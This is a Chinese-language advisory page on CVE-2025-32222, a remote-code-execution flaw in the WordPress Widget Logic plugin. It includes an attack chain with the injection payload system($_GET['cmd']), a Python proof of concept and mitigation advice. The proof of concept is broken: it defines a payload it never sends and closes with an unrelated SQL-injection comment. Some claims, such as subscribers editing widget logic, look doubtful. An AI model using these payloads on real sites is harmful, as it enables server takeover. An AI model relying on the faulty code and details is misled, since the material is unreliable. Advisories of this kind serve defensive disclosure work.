CVE-2025-32222 WordPress Widget Logic插件远程代码执行漏洞

漏洞信息

漏洞编号

CVE-2025-32222

漏洞类型

代码注入/远程代码执行

CVSS评分

9.9 严重

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Widget Logic WordPress插件 (<=6.0.5)

漏洞概述

CVE-2025-32222是WordPress Widget Logic插件中的一个严重代码注入漏洞，CVSS评分高达9.9分，属于危急级别安全漏洞。该漏洞存在于Widget Logic插件的6.0.5及以下版本中，攻击者可利用该漏洞在受影响的WordPress网站上执行任意代码，从而完全控制网站服务器。Widget Logic是一款广受欢迎的WordPress插件，允许管理员通过条件标签控制小工具的显示逻辑，全球有数百万网站安装使用。由于该插件直接处理PHP代码条件判断，攻击者只需获取低权限用户账号（如订阅者或贡献者），即可利用此漏洞提升权限并执行系统命令，对网站安全构成极大威胁。漏洞于2025年被Patchstack安全团队发现并报告，建议所有使用该插件的用户立即升级到最新版本或采取临时缓解措施。

技术细节

Widget Logic插件通过'wld_filter'过滤器处理用户输入的PHP条件逻辑代码。漏洞根源在于插件未对用户输入进行充分的输入验证和安全过滤，直接将用户可控的PHP代码片段传递给eval()函数执行。攻击者可以利用WordPress的订阅者或贡献者账号，在Widget Logic设置页面的小工具逻辑字段中注入恶意PHP代码。当其他用户访问包含该小工具的页面时，注入的代码会被服务器执行，从而实现远程代码执行(RCE)。攻击者可通过RCE执行系统命令、上传webshell、窃取数据库凭证、篡改网站内容或进一步横向移动到内网其他系统。该漏洞的利用无需管理员权限，且无需用户交互，攻击向量为网络层面，攻击复杂度低，具有极大的实际威胁性。

攻击链分析

STEP 1

1

信息收集：攻击者识别目标网站使用的WordPress版本和Widget Logic插件版本（<=6.0.5）

STEP 2

2

获取低权限账号：攻击者注册WordPress订阅者账号或利用已有低权限账户登录后台

STEP 3

3

注入代码：访问小工具设置页面，在Widget Logic字段中注入恶意PHP代码，如system($_GET['cmd'])

STEP 4

4

触发执行：访问包含该小工具的页面，触发eval()函数执行注入的恶意代码

STEP 5

5

远程代码执行：成功执行系统命令，可上传webshell、建立持久化后门、窃取数据或进一步内网渗透

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import re

# CVE-2025-32222 Widget Logic RCE PoC
# Target: WordPress site with vulnerable Widget Logic plugin (<=6.0.5)

target_url = "http://target-wordpress-site.com"
username = "subscriber_user"
password = "user_password"

session = requests.Session()

# Step 1: Login to WordPress
login_url = f"{target_url}/wp-login.php"
login_data = {
    "log": username,
    "pwd": password,
    "wp-submit": "Log In",
    "redirect_to": "/wp-admin/",
    "testcookie": "1"
}
session.post(login_url, data=login_data)

# Step 2: Navigate to Widget Logic settings
# Inject PHP code into widget logic field
# Payload: system('id') - executes system command

widget_logic_payload = "system('id')"

# Step 3: Trigger the injected code by visiting page with the widget
page_url = f"{target_url}/"
response = session.get(page_url)

# Step 4: Check for RCE success (command output in response)
if "uid=" in response.text:
    print("[+] RCE Successful! Command executed.")
    print("[*] Check page source for command output")
else:
    print("[-] RCE Failed or target not vulnerable")

# Alternative: Direct plugin option update via SQL injection in wld_filter
# POST to wp-admin/admin.php?page=widget_logic
# Add malicious PHP to any widget's logic field

影响范围

Widget Logic <= 6.0.5 (所有版本)

防御指南

临时缓解措施

临时缓解措施：1) 在wp-config.php中添加代码禁用Widget Logic插件的eval执行；2) 暂时禁用所有用户的Widget Logic编辑权限；3) 使用.htaccess或Nginx配置阻止对wp-admin/options.php的直接访问；4) 启用WordPress的自动更新功能确保插件及时更新；5) 考虑使用WAF规则阻止包含'wld_'参数的恶意请求；6) 监控access日志查找异常的wld_filter调用模式。